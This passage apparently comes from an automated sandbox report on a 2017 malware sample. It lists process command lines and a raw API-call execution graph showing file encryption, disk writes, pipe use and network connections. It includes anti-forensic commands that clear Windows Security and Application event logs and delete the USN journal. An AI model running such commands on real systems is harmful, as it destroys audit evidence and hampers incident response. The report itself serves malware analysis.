Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl Security
Imagebase:0x7a0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

General

Start time:22:08:13
Start date:12/07/2017
Path:C:\Windows\System32\wevtutil.exe
Wow64 process (32bit):false
Commandline:wevtutil cl Application
Imagebase:0x8f0000
File size:175616 bytes
MD5 hash:81538B795F922B8DA6FD897EFB04B5EE
Programmed in:C, C++ or other language

General

Start time:22:08:14
Start date:12/07/2017
Path:C:\Windows\System32\fsutil.exe
Wow64 process (32bit):false
Commandline:fsutil usn deletejournal /D C:
Imagebase:0xe20000
File size:74240 bytes
MD5 hash:B4834F08230A2EB7F498DE4E5B6AB814
Programmed in:C, C++ or other language

Disassembly

Code Analysis

    Execution Graph

    Execution Coverage:24.6%
    Dynamic/Decrypted Code Coverage:100%
    Signature Coverage:15.7%
    Total number of Nodes:1687
    Total number of Limit Nodes:18

    Graph: rendered execution graph of the analysed process (textual node and edge dump not reproduced)
6050->5849 6052 11e7d83 6051->6052 6059 11e7dde 6051->6059 6052->6059 6369 11e96c7 6052->6369 6055 11e7db2 Sleep 6056 11e8320 3 API calls 6055->6056 6057 11e7dc9 6056->6057 6058 11e7dcd PathFileExistsW 6057->6058 6057->6059 6058->6059 6059->5830 6059->5851 6061 11e8231 SetLastError 6060->6061 6062 11e81ef LookupPrivilegeValueW 6060->6062 6061->5862 6062->6061 6063 11e8201 AdjustTokenPrivileges GetLastError 6062->6063 6063->6061 6064 11e822f 6063->6064 6064->6061 6066 11e869a Process32FirstW 6065->6066 6067 11e7d12 GetModuleFileNameW 6065->6067 6068 11e874c CloseHandle 6066->6068 6069 11e86bc Process32NextW 6066->6069 6067->5860 6067->5869 6068->6067 6071 11e8749 6069->6071 6071->6068 6073 11e708f 6072->6073 6076 11e700f 6072->6076 6073->5881 6074 11e7085 GetProcessHeap HeapFree 6074->6073 6075 11e707b GetProcessHeap HeapFree 6075->6074 6076->6074 6076->6075 6077 11e7060 GetProcessHeap HeapFree 6076->6077 6078 11e704e GetProcessHeap HeapFree 6076->6078 6077->6076 6078->6077 6080 11e6df9 6079->6080 6080->6080 6081 11e6e04 GetProcessHeap HeapAlloc 6080->6081 6082 11e6ed0 6081->6082 6083 11e6e2b 6081->6083 6082->5892 6083->6083 6084 11e6e3c memcpy 6083->6084 6085 11e6e59 6084->6085 6085->6085 6086 11e6e64 GetProcessHeap HeapAlloc 6085->6086 6087 11e6ec6 GetProcessHeap HeapFree 6086->6087 6088 11e6e81 6086->6088 6087->6082 6088->6088 6089 11e6e92 memcpy 6088->6089 6090 11e7298 13 API calls 6089->6090 6091 11e6eb6 6090->6091 6091->6082 6092 11e6ebd GetProcessHeap HeapFree 6091->6092 6092->6087 6094 11e69d0 CommandLineToArgvW 6093->6094 6095 11e69bc 6093->6095 6096 11e69e4 6094->6096 6097 11e6a24 6094->6097 6095->6094 6098 11e6a1d LocalFree 6096->6098 6099 11e6a1c 6096->6099 6101 11e6fc7 6096->6101 6097->5894 6098->6097 6099->6098 6102 11e6ffd 6101->6102 6103 11e6fd1 6101->6103 6102->6096 6103->6102 6103->6103 6104 11e6fee 6103->6104 6105 11e7298 13 API calls 6104->6105 6106 11e6ffb 6105->6106 6106->6102 6108 11e8351 6107->6108 6109 11e8344 PathFindExtensionW 6107->6109 
6108->5903 6108->5904 6109->6108 6145 11e1038 memset memset 6110->6145 6115 11e15a2 6115->5909 6115->5916 6120 11e1661 memset 6121 11e1424 5 API calls 6120->6121 6122 11e168d 6121->6122 6122->6115 6123 11e1424 5 API calls 6122->6123 6124 11e16a8 6123->6124 6124->6115 6125 11e16b5 memcpy 6124->6125 6126 11e16d8 6125->6126 6126->6126 6127 11e16f0 memcpy 6126->6127 6128 11e170c 6126->6128 6127->6128 6128->6115 6129 11e1758 memcpy 6128->6129 6130 11e1751 6128->6130 6129->6130 6130->6115 6131 11e17e7 memcpy 6130->6131 6134 11e1808 6131->6134 6136 11e182c 6131->6136 6133 11e1384 6 API calls 6135 11e1852 6133->6135 6134->6136 6184 11e1384 6134->6184 6135->6115 6137 11e1384 6 API calls 6135->6137 6136->6115 6136->6133 6138 11e1871 6137->6138 6138->6115 6139 11e1384 6 API calls 6138->6139 6139->6115 6141 11e8ce7 6140->6141 6142 11e8ceb DeviceIoControl LocalAlloc 6140->6142 6141->5916 6143 11e8d4b CloseHandle 6142->6143 6144 11e8d1b DeviceIoControl WriteFile LocalFree 6142->6144 6143->6141 6144->6143 6146 11e10b0 memset GetSystemDirectoryA 6145->6146 6149 11e10fb 6145->6149 6147 11e110a CreateFileA 6146->6147 6148 11e10ed GetLastError 6146->6148 6147->6148 6150 11e112d DeviceIoControl 6147->6150 6148->6149 6149->6115 6159 11e122d 6149->6159 6151 11e114a GetLastError 6150->6151 6152 11e1166 _itoa 6150->6152 6153 11e1154 6151->6153 6156 11e1180 6152->6156 6154 11e1213 CloseHandle 6153->6154 6154->6149 6155 11e11c2 memcpy 6157 11e11de 6155->6157 6156->6153 6156->6155 6156->6157 6157->6154 6157->6157 6158 11e11fe memcpy 6157->6158 6158->6154 6160 11e124c CreateFileA 6159->6160 6164 11e1242 6159->6164 6161 11e1280 DeviceIoControl 6160->6161 6162 11e1268 GetLastError 6160->6162 6163 11e12a3 GetLastError 6161->6163 6166 11e12ad CloseHandle 6161->6166 6162->6164 6163->6166 6164->6115 6167 11e1424 CryptAcquireContextA 6164->6167 6166->6164 6168 11e1457 GetLastError 6167->6168 6169 11e146a CryptGenRandom 6167->6169 6172 11e145d 6168->6172 6170 11e1483 6169->6170 6171 11e147d 
GetLastError 6169->6171 6173 11e1495 CryptReleaseContext 6170->6173 6174 11e14a0 6170->6174 6171->6170 6172->6169 6172->6170 6173->6174 6174->6115 6175 11e12d5 6174->6175 6176 11e12f1 memset CreateFileA 6175->6176 6177 11e12e7 6175->6177 6178 11e131f GetLastError 6176->6178 6179 11e1337 SetFilePointerEx 6176->6179 6177->6115 6177->6120 6178->6177 6180 11e135e GetLastError 6179->6180 6181 11e134a ReadFile 6179->6181 6183 11e1368 6180->6183 6181->6180 6182 11e1374 CloseHandle 6181->6182 6182->6177 6183->6182 6185 11e139e CreateFileA 6184->6185 6190 11e1397 6184->6190 6186 11e13d2 SetFilePointerEx 6185->6186 6187 11e13ba GetLastError 6185->6187 6188 11e13e6 WriteFile 6186->6188 6189 11e13fe GetLastError 6186->6189 6187->6190 6188->6189 6191 11e1414 CloseHandle 6188->6191 6192 11e1408 6189->6192 6190->6134 6191->6190 6192->6191 6193->5921 6195 11e84d0 6194->6195 6195->5927 6197 11e7552 GetCurrentProcess GetModuleHandleW GetProcAddress 6196->6197 6197->5931 6197->5932 6199 11e85f0 LockResource 6198->6199 6200 11e864c 6198->6200 6199->6200 6201 11e85fe SizeofResource 6199->6201 6200->5935 6201->6200 6202 11e8614 GetProcessHeap RtlAllocateHeap 6201->6202 6202->6200 6203 11e862e 6202->6203 6212 11ea520 6203->6212 6205 11e8648 6205->6200 6206 11e8661 GetProcessHeap HeapFree 6205->6206 6206->6200 6208 11e73d1 WriteFile 6207->6208 6209 11e73f5 6207->6209 6210 11e73ee CloseHandle 6208->6210 6211 11e73e8 6208->6211 6209->5946 6209->5947 6210->6209 6211->6210 6217 11ebb31 6212->6217 6215 11ea569 6215->6205 6226 11ebaa4 6217->6226 6219 11ea559 6219->6215 6220 11ea5cc 6219->6220 6221 11eac60 6220->6221 6222 11ea5e0 6220->6222 6221->6215 6222->6221 6223 11eb8df 6222->6223 6224 11eaa1f memcpy 6222->6224 6223->6221 6231 11ebc5b 6223->6231 6224->6222 6227 11ebab1 6226->6227 6228 11ebac3 6226->6228 6227->6228 6230 11ec223 malloc 6227->6230 6228->6219 6230->6228 6232 11ebc71 6231->6232 6233 11ebcb1 memcpy 6232->6233 6234 11ebcc9 memcpy 6232->6234 6236 11ebc8a 6232->6236 6233->6236 6235 
11ebce8 memcpy 6234->6235 6234->6236 6235->6236 6236->6221 6238 11e7438 InitializeSecurityDescriptor 6237->6238 6239 11e753c 6237->6239 6238->6239 6240 11e7449 SetSecurityDescriptorDacl 6238->6240 6240->6239 6241 11e745e CreateNamedPipeW 6240->6241 6241->6241 6242 11e747c ConnectNamedPipe 6241->6242 6243 11e752e CloseHandle 6242->6243 6245 11e748c 6242->6245 6243->6241 6244 11e748f PeekNamedPipe 6244->6245 6245->6244 6246 11e74ad Sleep 6245->6246 6247 11e74be GetProcessHeap HeapAlloc 6245->6247 6249 11e751c FlushFileBuffers DisconnectNamedPipe 6245->6249 6246->6245 6248 11e74d2 ReadFile 6247->6248 6247->6249 6250 11e7511 GetProcessHeap HeapFree 6248->6250 6252 11e74eb 6248->6252 6249->6243 6250->6249 6251 11e74f3 StrChrW 6251->6250 6251->6252 6252->6250 6252->6251 6253 11e6de0 23 API calls 6252->6253 6253->6250 6255 11e8970 WriteFile 6254->6255 6256 11e8991 6254->6256 6257 11e898a CloseHandle 6255->6257 6258 11e8984 6255->6258 6256->5970 6256->5975 6257->6256 6258->6257 6259->5978 6261 11e1ea9 6260->6261 6262 11e1e7a GetLastError 6260->6262 6274 11e1b4e CryptGenKey 6261->6274 6266 11e1e87 6262->6266 6264 11e1e9a CryptAcquireContextW 6264->6261 6265 11e1edc 6264->6265 6267 11e1edf LocalFree 6265->6267 6266->6264 6266->6265 6268 11e1ecf CryptReleaseContext 6268->6267 6275 11e1b99 6274->6275 6276 11e1b73 CryptSetKeyParam CryptSetKeyParam 6274->6276 6275->6268 6277 11e1973 6275->6277 6276->6275 6278 11e1b46 6277->6278 6279 11e198b PathCombineW 6277->6279 6291 11e1d32 6278->6291 6279->6278 6280 11e19a9 FindFirstFileW 6279->6280 6280->6278 6283 11e19c9 6280->6283 6281 11e19d9 WaitForSingleObject 6282 11e1b3c FindClose 6281->6282 6281->6283 6282->6278 6283->6281 6283->6282 6284 11e1b25 FindNextFileW 6283->6284 6285 11e1a6b PathCombineW 6283->6285 6286 11e1ac2 PathFindExtensionW 6283->6286 6287 11e1a9a StrStrIW 6283->6287 6288 11e1973 9 API calls 6283->6288 6289 11e1aff StrStrIW 6283->6289 6308 11e189a CreateFileW 6283->6308 6284->6282 6284->6283 6285->6283 6285->6284 
6286->6283 6287->6283 6287->6284 6288->6283 6289->6283 6289->6284 6319 11e1ba0 CryptStringToBinaryW 6291->6319 6296 11e1d61 PathCombineW 6298 11e1e40 LocalFree 6296->6298 6299 11e1d7e 6296->6299 6297 11e1e4c CryptDestroyKey 6297->6268 6298->6297 6339 11e6973 GetTickCount 6299->6339 6301 11e1d83 6302 11e1d87 Sleep 6301->6302 6303 11e1d95 CreateFileW 6301->6303 6302->6303 6304 11e1db9 WriteFile WriteFile WriteFile WriteFile WriteFile 6303->6304 6305 11e1e3f 6303->6305 6306 11e1e1a 6304->6306 6305->6298 6306->6306 6307 11e1e25 WriteFile CloseHandle 6306->6307 6307->6305 6309 11e18c7 GetFileSizeEx 6308->6309 6310 11e1951 6308->6310 6312 11e18da CreateFileMappingW 6309->6312 6310->6284 6313 11e1948 CloseHandle 6312->6313 6314 11e18ff MapViewOfFile 6312->6314 6313->6310 6315 11e193f CloseHandle 6314->6315 6316 11e1913 CryptEncrypt 6314->6316 6315->6313 6317 11e192e FlushViewOfFile 6316->6317 6318 11e1938 UnmapViewOfFile 6316->6318 6317->6318 6318->6315 6320 11e1bd0 LocalAlloc 6319->6320 6321 11e1c75 6319->6321 6320->6321 6322 11e1be9 CryptStringToBinaryW 6320->6322 6321->6297 6329 11e1c7f CryptExportKey 6321->6329 6323 11e1bfe CryptDecodeObjectEx 6322->6323 6324 11e1c6c LocalFree 6322->6324 6323->6324 6325 11e1c20 LocalAlloc 6323->6325 6324->6321 6325->6324 6326 11e1c32 CryptDecodeObjectEx 6325->6326 6327 11e1c63 LocalFree 6326->6327 6328 11e1c48 CryptImportKey 6326->6328 6327->6324 6328->6327 6330 11e1cac LocalAlloc 6329->6330 6331 11e1d2a 6329->6331 6330->6331 6332 11e1cbe CryptExportKey 6330->6332 6331->6296 6331->6297 6333 11e1d21 LocalFree 6332->6333 6334 11e1cd2 CryptBinaryToStringW 6332->6334 6333->6331 6334->6333 6335 11e1cee LocalAlloc 6334->6335 6335->6333 6336 11e1d02 CryptBinaryToStringW 6335->6336 6337 11e1d15 6336->6337 6338 11e1d1a LocalFree 6336->6338 6337->6333 6338->6333 6339->6301 6341 11e92a9 6340->6341 6342 11e9319 6340->6342 6341->6342 6343 11e92f2 VirtualProtect 6341->6343 6342->6001 6343->6341 6345 11e71e5 EnterCriticalSection 6344->6345 6346 
11e7245 6344->6346 6347 11e723d LeaveCriticalSection 6345->6347 6348 11e71f8 6345->6348 6346->6032 6346->6033 6346->6034 6347->6346 6348->6347 6349->6043 6357 11e711f GetProcessHeap HeapAlloc 6350->6357 6352 11e6b9d 6352->6047 6353 11e6b1a 6353->6352 6354 11e6b62 StrCatW 6353->6354 6355 11e6b8d GetProcessHeap HeapFree 6353->6355 6363 11e7167 6354->6363 6355->6352 6358 11e715f 6357->6358 6359 11e713d 6357->6359 6358->6353 6360 11e7167 3 API calls 6359->6360 6361 11e714e 6360->6361 6361->6358 6362 11e7152 GetProcessHeap HeapFree 6361->6362 6362->6358 6364 11e7170 6363->6364 6367 11e71d1 6363->6367 6365 11e7175 EnterCriticalSection 6364->6365 6366 11e71b0 LeaveCriticalSection 6364->6366 6364->6367 6368 11e71c4 Sleep 6364->6368 6365->6364 6366->6364 6366->6367 6367->6353 6368->6365 6370 11e96ef PathFindFileNameW 6369->6370 6371 11e7dae 6369->6371 6370->6371 6372 11e9702 6370->6372 6371->6055 6371->6059 6372->6372 6373 11e9719 WideCharToMultiByte inet_addr 6372->6373 6374 11e974d 6373->6374 6376 11e9759 6373->6376 6378 11e9683 gethostbyname 6374->6378 6376->6371 6381 11e668a memset GetTickCount 6376->6381 6379 11e96c0 6378->6379 6380 11e9696 wsprintfA 6378->6380 6379->6376 6380->6379 6391 11e5a7e 6381->6391 6384 11e66ed 6386 11e5a7e 88 API calls 6384->6386 6385 11e66e4 6465 11e2068 6385->6465 6388 11e6715 6386->6388 6389 11e2068 closesocket 6388->6389 6390 11e66e9 6389->6390 6390->6371 6454 11e5a8f 6391->6454 6392 11e20b2 GetTickCount 6392->6454 6393 11e2ef5 16 API calls 6393->6454 6394 11e2f88 17 API calls 6394->6454 6397 11e2068 closesocket 6398 11e631c 6397->6398 6398->6384 6398->6385 6400 11e6355 6853 11e31fb 6400->6853 6402 11e6384 6404 11e63a9 6402->6404 6405 11e63cf 6402->6405 6403 11e20d0 GetProcessHeap HeapFree 6403->6454 6409 11e20d0 2 API calls 6404->6409 6408 11e20d0 2 API calls 6405->6408 6407 11e5a46 13 API calls 6407->6398 6410 11e6409 6408->6410 6455 11e632d 6409->6455 6410->6455 6882 11e1f74 6410->6882 6413 11e5c7a rand 6550 11e407b 6413->6550 6421 
11e1000 GetProcessHeap RtlAllocateHeap 6421->6454 6422 11e2068 closesocket 6423 11e62f1 Sleep 6422->6423 6423->6454 6424 11e64db 6425 11e660f 6424->6425 6428 11e64f2 memcpy memcpy 6424->6428 6432 11e20d0 2 API calls 6425->6432 6426 11e6641 6426->6455 6427 11e6324 6850 11e20d0 6427->6850 6433 11e20d0 2 API calls 6428->6433 6432->6455 6448 11e6530 6433->6448 6434 11e632f 6437 11e20d0 2 API calls 6434->6437 6436 11e65a5 Sleep 6440 11e65ef 6436->6440 6441 11e65b8 6436->6441 6439 11e6338 6437->6439 6443 11e20d0 2 API calls 6439->6443 6442 11e20d0 2 API calls 6440->6442 6445 11e3dd7 17 API calls 6441->6445 6442->6455 6443->6455 6446 11e65eb 6445->6446 6446->6425 6446->6440 6448->6425 6448->6436 6898 11e3dd7 6448->6898 6449 11e5ca4 6449->6426 6449->6454 6449->6455 6583 11e42df 6449->6583 6607 11e489c 6449->6607 6650 11e4ba1 6449->6650 6658 11e51f3 6449->6658 6671 11e5333 6449->6671 6452 11e5e28 Sleep 6799 11e6727 socket ioctlsocket 6452->6799 6454->6392 6454->6393 6454->6394 6454->6398 6454->6400 6454->6402 6454->6403 6454->6413 6454->6421 6454->6422 6454->6427 6454->6434 6454->6452 6454->6455 6456 11e6727 socket ioctlsocket htons inet_addr connect 6454->6456 6457 11e3ca0 8 API calls 6454->6457 6458 11e60de Sleep 6454->6458 6460 11e6145 closesocket 6454->6460 6461 11e6228 closesocket 6454->6461 6469 11e3061 6454->6469 6485 11e330e 6454->6485 6520 11e35fa 6454->6520 6536 11e3ec8 6454->6536 6753 11e2547 6454->6753 6778 11e688f 6454->6778 6783 11e243f 6454->6783 6786 11e3b5d 6454->6786 6819 11e369d 6454->6819 6835 11e3c0a 6454->6835 6845 11e5a46 6454->6845 6455->6407 6456->6454 6457->6454 6803 11e2ef5 6458->6803 6460->6454 6461->6454 6466 11e206f 6465->6466 6467 11e2075 closesocket 6466->6467 6468 11e2085 6466->6468 6467->6466 6468->6390 6914 11e29ce 6469->6914 6473 11e3087 6473->6454 6474 11e3098 6475 11e30a1 6474->6475 6476 11e30b3 6474->6476 6477 11e20d0 2 API calls 6475->6477 6478 11e688f 3 API calls 6476->6478 6477->6473 6479 11e30c4 6478->6479 6480 11e30d4 6479->6480 
6481 11e243f 5 API calls 6479->6481 6482 11e20d0 2 API calls 6480->6482 6481->6480 6483 11e30e3 6482->6483 6484 11e20d0 2 API calls 6483->6484 6484->6473 6950 11e2ccf 6485->6950 6488 11e2466 3 API calls 6489 11e3361 6488->6489 6492 11e336a 6489->6492 6956 11e1000 GetProcessHeap RtlAllocateHeap 6489->6956 6491 11e33c3 6491->6454 6496 11e20d0 2 API calls 6492->6496 6494 11e33e0 6495 11e33e9 6494->6495 6501 11e688f 3 API calls 6494->6501 6498 11e20d0 2 API calls 6495->6498 6510 11e3335 6496->6510 6497 11e337a 6499 11e3381 6497->6499 6500 11e338e memcpy 6497->6500 6498->6491 6503 11e20d0 2 API calls 6499->6503 6502 11e20d0 2 API calls 6500->6502 6505 11e3404 6501->6505 6504 11e33b1 6502->6504 6503->6492 6509 11e20d0 2 API calls 6504->6509 6506 11e3418 6505->6506 6508 11e243f 5 API calls 6505->6508 6507 11e20d0 2 API calls 6506->6507 6507->6495 6511 11e3414 6508->6511 6509->6510 6510->6491 6957 11e1000 GetProcessHeap RtlAllocateHeap 6510->6957 6511->6506 6512 11e3422 6511->6512 6958 11e1000 GetProcessHeap RtlAllocateHeap 6512->6958 6514 11e342f 6515 11e3452 memcpy 6514->6515 6516 11e3438 6514->6516 6515->6516 6517 11e20d0 2 API calls 6516->6517 6518 11e3443 6517->6518 6519 11e20d0 2 API calls 6518->6519 6519->6491 6960 11e2c1e 6520->6960 6524 11e3641 6525 11e365c 6524->6525 6526 11e364a 6524->6526 6528 11e688f 3 API calls 6525->6528 6527 11e20d0 2 API calls 6526->6527 6530 11e3630 6527->6530 6529 11e366d 6528->6529 6531 11e367d 6529->6531 6532 11e243f 5 API calls 6529->6532 6530->6454 6533 11e20d0 2 API calls 6531->6533 6532->6531 6534 11e368c 6533->6534 6535 11e20d0 2 API calls 6534->6535 6535->6530 6538 11e3ed6 6536->6538 6539 11e3f07 6538->6539 6540 11e3f0e 6538->6540 6983 11e3734 6538->6983 6539->6454 6541 11e35fa 14 API calls 6540->6541 6542 11e3f37 6541->6542 6542->6539 7012 11e1000 GetProcessHeap RtlAllocateHeap 6542->7012 6544 11e3f70 6544->6539 6545 11e4030 rand 6544->6545 6545->6545 6546 11e4044 6545->6546 7013 11e3863 6546->7013 6549 11e20d0 2 API calls 
6549->6539 6551 11e3061 16 API calls 6550->6551 6553 11e40a1 6551->6553 6552 11e40a5 6552->6449 6553->6552 7058 11e1000 GetProcessHeap RtlAllocateHeap 6553->7058 6555 11e40b8 6555->6552 7059 11e1000 GetProcessHeap RtlAllocateHeap 6555->7059 6557 11e40d7 6558 11e2c1e 6 API calls 6557->6558 6563 11e4242 6557->6563 6565 11e411e 6558->6565 6559 11e20d0 2 API calls 6559->6552 6560 11e412f memcpy 6561 11e20d0 2 API calls 6560->6561 6561->6565 6562 11e20d0 2 API calls 6562->6563 6563->6559 6564 11e2c1e 6 API calls 6564->6565 6565->6560 6565->6564 6566 11e417f memcpy 6565->6566 6568 11e688f 3 API calls 6565->6568 6569 11e423a 6565->6569 6570 11e243f 5 API calls 6565->6570 6572 11e4247 6565->6572 6576 11e4125 6565->6576 6567 11e20d0 2 API calls 6566->6567 6567->6565 6568->6565 6571 11e20d0 2 API calls 6569->6571 6570->6565 6571->6563 7060 11e30fe 6572->7060 6575 11e4275 6577 11e20d0 2 API calls 6575->6577 6576->6562 6578 11e427a 6577->6578 6579 11e20d0 2 API calls 6578->6579 6580 11e4282 Sleep 6579->6580 6581 11e429d 6580->6581 6581->6552 6582 11e35fa 14 API calls 6581->6582 6582->6581 7092 11e1000 GetProcessHeap RtlAllocateHeap 6583->7092 6585 11e42ef 6586 11e4302 rand 6585->6586 6594 11e42fa 6585->6594 6587 11e2c1e 6 API calls 6586->6587 6606 11e434c 6587->6606 6588 11e1000 GetProcessHeap RtlAllocateHeap 6588->6606 6589 11e20d0 2 API calls 6590 11e480e 6589->6590 6591 11e20d0 2 API calls 6590->6591 6591->6594 6592 11e47ea 6593 11e20d0 2 API calls 6592->6593 6595 11e47f2 6593->6595 6594->6449 6595->6589 6596 11e438b memcpy 6596->6606 6597 11e2c1e 6 API calls 6597->6606 6598 11e43db memcpy 6601 11e20d0 2 API calls 6598->6601 6599 11e47e2 6600 11e20d0 2 API calls 6599->6600 6600->6592 6601->6606 6602 11e688f 3 API calls 6602->6606 6603 11e243f 5 API calls 6603->6606 6604 11e20d0 GetProcessHeap HeapFree 6604->6606 6606->6588 6606->6592 6606->6595 6606->6596 6606->6597 6606->6598 6606->6599 6606->6602 6606->6603 6606->6604 7093 11e3986 6606->7093 6608 11e2c1e 6 API calls 
6607->6608 6609 11e48d8 6608->6609 6610 11e48df 6609->6610 7139 11e1000 GetProcessHeap RtlAllocateHeap 6609->7139 6610->6449 6612 11e4905 6614 11e4922 memcpy 6612->6614 6615 11e2c1e 6 API calls 6612->6615 6616 11e499f 6612->6616 6618 11e496f memcpy 6612->6618 6619 11e49ca 6612->6619 6627 11e49d2 6612->6627 6613 11e20d0 2 API calls 6617 11e4a04 6613->6617 6614->6612 6615->6612 7140 11e1000 GetProcessHeap RtlAllocateHeap 6616->7140 6621 11e20d0 2 API calls 6617->6621 6622 11e20d0 2 API calls 6618->6622 6625 11e20d0 2 API calls 6619->6625 6623 11e4a11 6621->6623 6622->6612 7141 11e1000 GetProcessHeap RtlAllocateHeap 6623->7141 6624 11e49a9 6624->6619 6628 11e49b0 6624->6628 6625->6627 6627->6613 6627->6617 6629 11e688f 3 API calls 6628->6629 6633 11e49c0 6629->6633 6630 11e4a1c 6630->6610 6631 11e3863 15 API calls 6630->6631 6634 11e4a47 6631->6634 6632 11e49c4 6636 11e20d0 2 API calls 6632->6636 6633->6632 6635 11e243f 5 API calls 6633->6635 6637 11e20d0 2 API calls 6634->6637 6635->6632 6638 11e49ed 6636->6638 6640 11e4a52 6637->6640 6639 11e20d0 2 API calls 6638->6639 6639->6627 6640->6610 7142 11e4820 6640->7142 6644 11e4aae 6645 11e3986 16 API calls 6644->6645 6646 11e4adc 6645->6646 6647 11e20d0 2 API calls 6646->6647 6648 11e4ae3 6647->6648 6649 11e20d0 2 API calls 6648->6649 6649->6610 6651 11e4bb7 6650->6651 7151 11e1000 GetProcessHeap RtlAllocateHeap 6651->7151 6653 11e4bd6 6654 11e4bdd 6653->6654 7152 11e4afe 6653->7152 6654->6449 6657 11e20d0 2 API calls 6657->6654 6659 11e520e 6658->6659 7158 11e4c1c 6659->7158 6661 11e524d 6662 11e20d0 2 API calls 6661->6662 6669 11e5255 6662->6669 6663 11e52a0 6665 11e20d0 2 API calls 6663->6665 6664 11e5248 6664->6661 6664->6663 6666 11e52a8 6665->6666 7213 11e50e0 6666->7213 6669->6449 6670 11e50e0 18 API calls 6670->6669 6672 11e3734 14 API calls 6671->6672 6673 11e535b 6672->6673 6674 11e5598 6673->6674 7235 11e1000 GetProcessHeap RtlAllocateHeap 6673->7235 6674->6449 6676 11e536b 6676->6674 6677 11e4afe 16 API 
calls 6676->6677 6678 11e53c5 6677->6678 6679 11e20d0 2 API calls 6678->6679 6680 11e53d0 6679->6680 6680->6674 6681 11e54de 6680->6681 7236 11e1000 GetProcessHeap RtlAllocateHeap 6680->7236 6681->6674 7238 11e1000 GetProcessHeap RtlAllocateHeap 6681->7238 6684 11e54ef 6684->6674 6686 11e4afe 16 API calls 6684->6686 6685 11e540e 6685->6674 6688 11e4afe 16 API calls 6685->6688 6687 11e5531 6686->6687 6689 11e20d0 2 API calls 6687->6689 6690 11e5474 6688->6690 6692 11e553c 6689->6692 6691 11e20d0 2 API calls 6690->6691 6694 11e547f 6691->6694 6692->6674 6696 11e55db 6692->6696 7239 11e1000 GetProcessHeap RtlAllocateHeap 6692->7239 6694->6674 7237 11e1000 GetProcessHeap RtlAllocateHeap 6694->7237 6695 11e562f 6695->6674 7241 11e1000 GetProcessHeap RtlAllocateHeap 6695->7241 6696->6674 6696->6695 7240 11e1000 GetProcessHeap RtlAllocateHeap 6696->7240 6700 11e5556 6700->6674 6703 11e4afe 16 API calls 6700->6703 6701 11e55f1 6701->6674 6706 11e4afe 16 API calls 6701->6706 6702 11e5499 6702->6674 6705 11e4afe 16 API calls 6702->6705 6708 11e558b 6703->6708 6704 11e5664 6704->6674 6707 11e4afe 16 API calls 6704->6707 6709 11e54d3 6705->6709 6710 11e5624 6706->6710 6711 11e569b 6707->6711 6712 11e55a0 6708->6712 6713 11e5590 6708->6713 6717 11e20d0 2 API calls 6709->6717 6715 11e20d0 2 API calls 6710->6715 6714 11e20d0 2 API calls 6711->6714 6718 11e4afe 16 API calls 6712->6718 6716 11e20d0 2 API calls 6713->6716 6720 11e56a5 6714->6720 6715->6695 6716->6674 6717->6681 6719 11e55d0 6718->6719 6721 11e20d0 2 API calls 6719->6721 6720->6674 7242 11e1000 GetProcessHeap RtlAllocateHeap 6720->7242 6721->6696 6723 11e56bf 6723->6674 6724 11e3986 16 API calls 6723->6724 6725 11e56fe 6724->6725 6726 11e20d0 2 API calls 6725->6726 6727 11e5705 6726->6727 6727->6674 6728 11e4c1c 17 API calls 6727->6728 6729 11e574a 6728->6729 6730 11e20d0 2 API calls 6729->6730 6731 11e57b3 6730->6731 7243 11e1000 GetProcessHeap RtlAllocateHeap 6731->7243 6733 11e57ef 6733->6674 6734 11e4afe 16 API 
calls 6733->6734 6735 11e58ad 6734->6735 6736 11e20d0 2 API calls 6735->6736 6737 11e58b7 6736->6737 6737->6674 6738 11e4820 16 API calls 6737->6738 6739 11e58f9 6737->6739 6738->6739 6739->6674 6740 11e5975 6739->6740 6741 11e4820 16 API calls 6739->6741 6740->6674 6742 11e4820 16 API calls 6740->6742 6741->6740 6743 11e59da 6742->6743 6743->6674 7244 11e1000 GetProcessHeap RtlAllocateHeap 6743->7244 6745 11e59e8 6745->6674 7245 11e1000 GetProcessHeap RtlAllocateHeap 6745->7245 6747 11e59f9 6747->6674 6748 11e330e 16 API calls 6747->6748 6749 11e5a2c 6748->6749 6750 11e20d0 2 API calls 6749->6750 6751 11e5a36 6750->6751 6752 11e20d0 2 API calls 6751->6752 6752->6674 7246 11e1000 GetProcessHeap RtlAllocateHeap 6753->7246 6755 11e255b 6774 11e2564 6755->6774 7247 11e24d0 6755->7247 6758 11e2589 6760 11e2466 3 API calls 6758->6760 6759 11e257f 6761 11e20d0 2 API calls 6759->6761 6762 11e25b2 6760->6762 6761->6774 6763 11e25b9 6762->6763 6764 11e25d2 6762->6764 6766 11e20d0 2 API calls 6763->6766 7253 11e1000 GetProcessHeap RtlAllocateHeap 6764->7253 6768 11e25c1 6766->6768 6767 11e25db 6769 11e25fe memcpy 6767->6769 6770 11e25e2 6767->6770 6771 11e20d0 2 API calls 6768->6771 6769->6770 6772 11e20d0 2 API calls 6770->6772 6771->6774 6773 11e25ea 6772->6773 6775 11e20d0 2 API calls 6773->6775 6774->6454 6776 11e25f2 6775->6776 6777 11e20d0 2 API calls 6776->6777 6777->6774 6779 11e68a0 memset select 6778->6779 6780 11e690e 6778->6780 6779->6780 6781 11e68f0 6779->6781 6780->6454 6781->6780 6782 11e68f4 send 6781->6782 6782->6780 7255 11e67af memset select 6783->7255 7264 11e1000 GetProcessHeap RtlAllocateHeap 6786->7264 6788 11e3b6d 6789 11e3b7b memset 6788->6789 6796 11e3b76 6788->6796 6790 11e3bab 6789->6790 6792 11e3bfd 6790->6792 6794 11e3bd7 6790->6794 7265 11e3469 6790->7265 6793 11e20d0 2 API calls 6792->6793 6793->6796 6795 11e20d0 2 API calls 6794->6795 6797 11e3bdf 6795->6797 6796->6454 6798 11e369d 13 API calls 6797->6798 6798->6796 6800 11e675c 6799->6800 
